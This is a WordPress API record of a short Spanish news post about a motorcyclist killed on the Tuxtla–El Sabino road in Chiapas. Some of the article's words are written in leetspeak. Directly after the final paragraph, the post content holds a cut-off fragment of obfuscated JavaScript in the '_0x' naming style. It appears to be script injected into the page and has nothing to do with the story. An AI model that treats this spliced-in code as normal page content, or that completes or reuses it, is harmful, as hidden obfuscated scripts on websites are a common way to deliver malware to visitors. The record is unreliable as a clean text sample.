{"id":24792,"date":"2025-10-25T04:52:58","date_gmt":"2025-10-25T04:52:58","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24792"},"modified":"2025-10-25T04:52:58","modified_gmt":"2025-10-25T04:52:58","slug":"mu3r3-motociclista-en-el-tramo-tuxtla-el-sabino","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24792","title":{"rendered":"Mu3r3 motociclista en el tramo Tuxtla-El Sabino"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000400676-1024x576.jpg\" alt=\"\" class=\"wp-image-24793\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000400676-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000400676-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000400676-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000400676-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000400676.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 24 de octubre del 2025. &#8211; Este viernes por la noche se accident\u00f3 y fall3ci0 un motociclista en el tramo Tuxtla-El Sabino rumbo a Berrioz\u00e1bal.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que este hecho cuando el motociclista circulaba de Oriente a Poniente cuando de manera repentina derrap\u00f3 y se estrell\u00f3 contra el pavimento.<\/p>\n\n\n\n<p>Por el golpe el motociclista identificado como Dibi\u00e1n perdi\u00f3 la vida de manera instant\u00e1nea.<\/p>\n\n\n\n<p>Al lugar arribaron elementos polic\u00edacos para acordonar el \u00e1rea<\/p>\n\n\n\n<p>Finalmente peritos de la Fiscal\u00eda General del Estado realizaron las diligencias correspondientes, levantaron el cuerpo y lo trasladaron al Semefo donde se practicar\u00eda la necropsia de ley.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 24 de octubre del 2025. &#8211; Este viernes por la noche se accident\u00f3 y fall3ci0 un motociclista en el tramo Tuxtla-El Sabino rumbo a Berrioz\u00e1bal. Los reportes oficiales informaron que este hecho cuando el motociclista circulaba de Oriente a Poniente cuando de manera repentina derrap\u00f3 y se estrell\u00f3 contra el pavimento. &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24793,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-24792","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24792","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24792"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24792\/revisions"}],"predecessor-version":[{"id":24794,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24792\/revisions\/24794"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24793"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24792"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24792"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24792"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}